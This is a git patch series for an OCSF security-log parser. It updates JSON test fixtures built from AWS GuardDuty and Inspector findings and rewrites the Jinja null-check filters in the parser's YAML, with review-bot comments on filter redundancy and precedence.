\"profiles\": [\"cloud\", \"datetime\", \"linux\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"evidences[].src_endpoint.ip\", \"type\": \"IP Address\", \"type_id\": 2, \"value\": \"52.94.133.131\"}, {\"name\": \"resources[].uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE\"}], \"resources\": [{\"cloud_partition\": \"aws\", \"data\": \"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"AROATMJPC7YEXAMPLE:example\\\",\\\"PrincipalName\\\":\\\"Admin\\\",\\\"PrincipalType\\\":\\\"AssumedRole\\\"}}\", \"region\": \"us-east-2\", \"type\": \"AwsIamAccessKey\", \"uid\": \"AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE\"}], \"severity\": \"Low\", \"severity_id\": 2, \"status\": \"New\", \"time\": 1695135922487, \"time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"type_name\": \"Detection Finding: Create\", \"type_uid\": 200401, \"unmapped\": {\"FindingProviderFields.Severity.Label\": \"LOW\", \"FindingProviderFields.Types[]\": \"TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled\", \"ProductFields.aws/guardduty/service/action/actionType\": \"AWS_API_CALL\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::CloudTrail::Trail\": \"arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType\": \"Remote IP\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn\": \"16509\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg\": \"AMAZON-02\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp\": \"Amazon Office\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org\": \"Amazon Office\", \"ProductFields.aws/guardduty/service/additionalInfo/type\": \"default\", \"ProductFields.aws/guardduty/service/archived\": \"false\", 
\"ProductFields.aws/guardduty/service/count\": \"1\", \"ProductFields.aws/guardduty/service/detectorId\": \"1ac1bfceda6679698215d5d0EXAMPLE\", \"ProductFields.aws/guardduty/service/eventFirstSeen\": \"2023-09-19T14:55:09.000Z\", \"ProductFields.aws/guardduty/service/eventLastSeen\": \"2023-09-19T14:55:09.000Z\", \"ProductFields.aws/guardduty/service/resourceRole\": \"TARGET\", \"ProductFields.aws/guardduty/service/serviceName\": \"guardduty\", \"ProductFields.aws/securityhub/CompanyName\": \"Amazon\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/guardduty/arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b\", \"ProductFields.aws/securityhub/ProductName\": \"GuardDuty\", \"RecordState\": \"ACTIVE\", \"Sample\": \"false\", \"Severity.Normalized\": \"40\", \"Severity.Product\": \"2\", \"WorkflowState\": \"NEW\"}}", "event": { "action": "create", - "category": [], + "category": [ + "vulnerability" + ], "severity": 2, - "type": [] + "type": [ + "info" + ] }, "@timestamp": "2023-09-19T15:05:22.487000Z", "cloud": { diff --git a/OCSF/ocsf/tests/test_detection_finding_2.json b/OCSF/ocsf/tests/test_detection_finding_2.json index cecfab8d5..2f37b29b8 100644 --- a/OCSF/ocsf/tests/test_detection_finding_2.json +++ b/OCSF/ocsf/tests/test_detection_finding_2.json 
@@ -12,9 +12,13 @@ "message": "{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root 
credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n", "event": { "action": "update", - "category": [], + "category": [ + "vulnerability" + ], "severity": 2, - "type": [] + "type": [ + "info" + ] }, "@timestamp": "2024-09-11T13:44:41.022000Z", "cloud": { 
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json index ddc18e5c4..47b46332d 100644 --- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json +++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json 
@@ -6,9 +6,13 @@ "message": "{\"activity_id\": 2, \"activity_name\": \"Update\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Vulnerability Finding\", \"class_uid\": 2002, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"finding_info\": {\"created_time_dt\": \"2023-04-21T11:59:04.000-04:00\", \"desc\": \"Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARM\\nplatform contains a bug that could cause it to read past the input buffer,\\nleading to a crash.\\n\\nImpact summary: Applications that use the AES-XTS algorithm on the 64 bit ARM\\nplatform can crash in rare circumstances. The AES-XTS algorithm is usually\\nused for disk encryption.\\n\\nThe AES-XTS cipher decryption implementation for 64 bit ARM platform will read\\npast the end of the ciphertext buffer if the ciphertext size is 4 mod 5 in 16\\nbyte blocks, e.g. 144 bytes or 1024 bytes. If the memory after the ciphertext\\nbuffer is unmapped, this will trigger a crash which results in a denial of\\nservice.\\n\\nIf an attacker can control the size and location of the ciphertext buffer\\nbeing decrypted by an application using AES-XTS on 64 bit ARM, the\\napplication is affected. 
This is fairly unlikely making this issue\\na Low severity one.\", \"first_seen_time_dt\": \"2023-04-21T11:59:04.000-04:00\", \"last_seen_time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"modified_time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"title\": \"CVE-2023-1255 - openssl\", \"types\": [\"Software and Configuration Checks/Vulnerabilities/CVE\"], \"uid\": \"arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5\"}, \"metadata\": {\"log_version\": \"2018-10-08\", \"processed_time_dt\": \"2024-01-26T17:59:56.923-05:00\", \"product\": {\"feature\": {\"uid\": \"AWSInspector\"}, \"name\": \"Inspector\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/inspector\", \"vendor_name\": \"Amazon\", \"version\": \"2\"}, \"profiles\": [\"cloud\", \"datetime\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"resource.uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\"}], \"resource\": {\"cloud_partition\": \"aws\", \"data\": \"{\\\"AwsEcrContainerImage\\\":{\\\"Architecture\\\":\\\"amd64\\\",\\\"ImageDigest\\\":\\\"sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\\\",\\\"ImagePublishedAt\\\":\\\"2023-04-11T21:07:55Z\\\",\\\"RegistryId\\\":\\\"111111111111\\\",\\\"RepositoryName\\\":\\\"browserhostingstack-EXAMPLE-btb1o54yh1jr\\\"}}\", \"region\": \"us-east-2\", \"type\": \"AwsEcrContainerImage\", \"uid\": \"arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\"}, \"severity\": \"Medium\", \"severity_id\": 3, \"status\": \"New\", \"time\": 1706307554000, \"time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"type_name\": \"Vulnerability Finding: Update\", \"type_uid\": 200202, \"unmapped\": {\"FindingProviderFields.Severity.Label\": 
\"MEDIUM\", \"FindingProviderFields.Types[]\": \"Software and Configuration Checks/Vulnerabilities/CVE\", \"ProductFields.aws/inspector/FindingStatus\": \"ACTIVE\", \"ProductFields.aws/inspector/inspectorScore\": \"5.9\", \"ProductFields.aws/inspector/packageVulnerabilityDetails/vulnerablePackages/sourceLayerHashes\": \"sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09\", \"ProductFields.aws/inspector/resources/1/resourceDetails/awsEcrContainerImageDetails/platform\": \"ALPINE_LINUX_3_17\", \"ProductFields.aws/securityhub/CompanyName\": \"Amazon\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/inspector/arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5\", \"ProductFields.aws/securityhub/ProductName\": \"Inspector\", \"RecordState\": \"ACTIVE\", \"Severity.Normalized\": \"40\", \"Vulnerabilities[].Cvss[].Source\": \"NVD,NVD\", \"Vulnerabilities[].Vendor.VendorSeverity\": \"MEDIUM\", \"Vulnerabilities[].VulnerablePackages[].SourceLayerHash\": \"sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09\", \"WorkflowState\": \"NEW\"}, \"vulnerabilities\": [{\"affected_packages\": [{\"architecture\": \"X86_64\", \"epoch\": 0, \"fixed_in_version\": \"0:3.0.8-r4\", \"name\": \"openssl\", \"package_manager\": \"OS\", \"release\": \"r3\", \"remediation\": {\"desc\": \"apk update && apk upgrade openssl\"}, \"version\": \"3.0.8\"}], \"cve\": {\"created_time_dt\": \"2023-04-20T13:15:06.000-04:00\", \"cvss\": [{\"base_score\": 5.9, \"vector_string\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}, {\"base_score\": 5.9, \"vector_string\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}], \"epss\": {\"score\": \"0.00066\"}, \"modified_time_dt\": \"2023-09-08T13:15:15.000-04:00\", \"references\": [\"https://nvd.nist.gov/vuln/detail/CVE-2023-1255\"], \"uid\": \"CVE-2023-1255\"}, \"is_exploit_available\": true, 
\"is_fix_available\": true, \"references\": [\"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bc2f61ad70971869b242fc1cb445b98bad50074a\", \"https://www.openssl.org/news/secadv/20230419.txt\", \"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=02ac9c9420275868472f33b01def01218742b8bb\"], \"remediation\": {\"desc\": \"Remediation is available. Please refer to the Fixed version in the vulnerability details section above.For detailed remediation guidance for each of the affected packages, refer to the vulnerabilities section of the detailed finding JSON.\"}, \"vendor_name\": \"NVD\"}]}", "event": { "action": "update", - "category": [], + "category": [ + "vulnerability" + ], "severity": 3, - "type": [] + "type": [ + "info" + ] }, "@timestamp": "2024-01-26T22:19:14Z", "cloud": { From 09b16b028fac90250a33e0814edd807332e2f17a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 16 Sep 2024 17:28:46 +0200 Subject: [PATCH 034/317] refactor(OCSF): change the way to test the nullable values --- OCSF/ocsf/ingest/parser.yml | 162 ++++++++++++++++++------------------ 1 file changed, 81 insertions(+), 81 deletions(-) diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 6a711a8ba..668a21e40 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -14,7 +14,7 @@ pipeline: properties: input_field: "{{ parse_event.message.end_time_dt }}" output_field: datetime - filter: "{{ parse_event.message.end_time_dt != null and parse_event.message.end_time_dt != '' }}" + filter: "{{ parse_event.message.get('end_time_dt') != None and parse_event.message.end_time_dt != '' }}" - name: parse_date_end_time external: 
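Review bot: The new filter `parse_event.message.get('end_time_dt') != None and parse_event.message.end_time_dt != ''` reaches the same key two different ways and spells the null/empty test as two clauses; `filter: "{{ parse_event.message.get('end_time_dt') not in [None, ''] }}"` says the same thing once and is the form the seven sibling date filters rewritten in this commit could share. Jinja also offers `is not none` for the null test, which reads better than `!= None` inside a YAML-quoted string. The `parse_date_end_time_dt` stage header this filter belongs to starts above the hunk.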
@@ -22,7 +22,7 @@ pipeline: properties: input_field: "{{ parse_event.message.end_time }}" output_field: datetime - filter: "{{ parse_event.message.end_time != null and parse_event.message.end_time != '' }}" + filter: "{{ parse_event.message.get('end_time') != None and parse_event.message.end_time != '' }}" - name: parse_date_timestamp_from_time_dt external: @@ -30,7 +30,7 @@ pipeline: properties: input_field: "{{ parse_event.message.time_dt }}" output_field: datetime - filter: "{{ parse_event.message.time_dt != null and parse_event.message.time_dt != '' }}" + filter: "{{ parse_event.message.get('time_dt') != None and parse_event.message.time_dt != '' }}" - name: parse_date_timestamp_from_time external: @@ -38,7 +38,7 @@ pipeline: properties: input_field: "{{ parse_event.message.time }}" output_field: datetime - filter: "{{ parse_event.message.time != null and parse_event.message.time != '' }}" + filter: "{{ parse_event.message.get('time') != None and parse_event.message.time != '' }}" - name: parse_date_time_dt external: @@ -46,7 +46,7 @@ pipeline: properties: input_field: "{{ parse_event.message.time_dt }}" output_field: datetime - filter: "{{ parse_event.message.time_dt != null and parse_event.message.time_dt != '' }}" + filter: "{{ parse_event.message.get('time_dt') != None and parse_event.message.time_dt != '' }}" - name: parse_date_time external: @@ -54,7 +54,7 @@ pipeline: properties: input_field: "{{ parse_event.message.time }}" output_field: datetime - filter: "{{ parse_event.message.time != null and parse_event.message.time != '' }}" + filter: "{{ parse_event.message.get('time') != None and parse_event.message.time != '' }}" - name: parse_date_start_time_dt external: 
@@ -62,7 +62,7 @@ pipeline: properties: input_field: "{{ parse_event.message.start_time_dt }}" output_field: datetime - filter: "{{ parse_event.message.start_time_dt != null and parse_event.message.start_time_dt != '' }}" + filter: "{{ parse_event.message.get('start_time_dt') != None and parse_event.message.start_time_dt != '' }}" - name: parse_date_start_time external: @@ -70,7 +70,7 @@ pipeline: properties: input_field: "{{ parse_event.message.start_time }}" output_field: datetime - filter: "{{ parse_event.message.start_time != null and parse_event.message.start_time != '' }}" + filter: "{{ parse_event.message.get('start_time') != None and parse_event.message.start_time != '' }}" - name: set_timestamp - name: set_event_kind 
@@ -79,64 +79,64 @@ pipeline: - name: set_common_fields - name: pipeline_object_actor - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.actor != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" - name: pipeline_object_attack - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.attacks != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" - name: 
pipeline_object_network_connection_info - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.connection_info != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" - name: pipeline_object_device - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.device != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" - name: pipeline_object_http_request - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.http_request != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in 
[3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}" - name: pipeline_object_malware - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99904001,99904002,99904009,99904010] and parse_event.message.malware != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99904001,99904002,99904009,99904010] and parse_event.message.get('malware') != None }}" - name: pipeline_object_network_endpoint - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.dst_endpoint != null or parse_event.message.src_endpoint != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}" - name: pipeline_object_process - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.process != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in 
[1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" - name: pipeline_object_proxy - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.proxy != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}" - name: pipeline_object_tls - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6001,6004,99904009,99904010] and parse_event.message.tls != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6001,6004,99904009,99904010] and parse_event.message.get('tls') != None }}" - name: pipeline_object_traffic - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,99904009,99904010] and parse_event.message.traffic != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,99904009,99904010] and parse_event.message.get('traffic') != None }}" - name: pipeline_object_user - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.user != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}" - name: pipeline_object_file - filter: 
"{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.file != null }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" - name: pipeline_object_system_activity_helper - filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" - name: pipeline_category_system_activity - filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 1 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 1 }}" - name: pipeline_category_findings - filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 2 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 2 }}" - name: pipeline_category_identity_and_access_management - filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 3 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 3 }}" - name: pipeline_category_network_activity - filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 4 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 4 }}" - name: pipeline_category_application_activity - filter: "{{ 
parse_event.message.category_uid != null and parse_event.message.category_uid == 6 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 6 }}" - name: pipeline_category_discovery - filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 5 }}" + filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 5 }}" stages: set_timestamp: @@ -164,8 +164,8 @@ stages: - set: event.category: > [ - {%- if parse_event.message.class_uid == 2001 and parse_event.message.malware != null -%}'malware',{%- endif -%} - {%- if parse_event.message.class_uid == 2001 and parse_event.message.vulnerabilities != null -%}'vulnerability',{%- endif -%} + {%- if parse_event.message.class_uid == 2001 and parse_event.message.get('malware') != None -%}'malware',{%- endif -%} + {%- if parse_event.message.class_uid == 2001 and parse_event.message.get('vulnerabilities') != None -%}'vulnerability',{%- endif -%} {%- if parse_event.message.class_uid in [2002, 2003, 2004, 2005, 2006] -%}'vulnerability',{%- endif -%} {%- if parse_event.message.class_uid in [3001, 3005, 3006] -%}'iam',{%- endif -%} {%- if parse_event.message.class_uid == 3002 -%}'authentication',{%- endif -%} 
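Review bot: The rewritten `pipeline_object_network_endpoint` filter keeps the old precedence bug: `... and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None` parses as `(class gate and dst_endpoint) or src_endpoint`, so any event carrying a top-level `src_endpoint` runs the endpoint pipeline regardless of `class_uid`, while `dst_endpoint`-only events stay gated. Wrap the endpoint test: `... and (parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None) }}"`. Separately, every filter in this hunk now prefixes the membership test with `parse_event.message.get('class_uid') != None and`; since `None in [...]` is already false, that guard is dead weight that could be dropped from all twenty lines.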
@@ -237,19 +237,19 @@ stages: - set: event.end: "{{parse_date_end_time_dt.datetime}}" - filter: "{{parse_date_end_time_dt.datetime != null}}" + filter: "{{parse_date_end_time_dt.get('datetime') != None}}" - set: event.end: "{{parse_date_end_time.datetime}}" - filter: "{{parse_date_end_time.datetime != null}}" + filter: "{{parse_date_end_time.get('datetime') != None}}" - set: event.start: "{{parse_date_start_time_dt.datetime}}" - filter: "{{parse_date_start_time_dt.datetime != null}}" + filter: "{{parse_date_start_time_dt.get('datetime') != None}}" - set: event.start: "{{parse_date_start_time.datetime}}" - filter: "{{parse_date_start_time.datetime != null}}" + filter: "{{parse_date_start_time.get('datetime') != None}}" - translate: dictionary: @@ -267,7 +267,7 @@ stages: - set: container.image.tag: - "{{ parse_event.message.actor.process.container.image.tag }}" - filter: "{{ parse_event.message.actor.process.container.image.tag != null }}" + filter: "{{ parse_event.message.actor.process.container.image.get('tag') != None }}" - set: orchestrator.type: "{{ parse_event.message.actor.process.container.orchestrator }}" #container.labels: "{{ parse_event.message.actor.process.container.image.labels }}" # @todo should be a dict? @@ -309,11 +309,11 @@ stages: - set: process.group.id: - "{{ parse_event.message.actor.process.egid }}" - filter: "{{ parse_event.message.actor.process.egid != null }}" + filter: "{{ parse_event.message.actor.process.get('egid') != None }}" - set: process.group.id: - "{{ parse_event.message.actor.process.group.uid }}" - filter: "{{ parse_event.message.actor.process.group.uid != null }}" + filter: "{{ parse_event.message.actor.process.group.get('uid') != None }}" - set: process.group.name: "{{ parse_event.message.actor.process.group.name }}" process.name: "{{ parse_event.message.actor.process.name }}" 
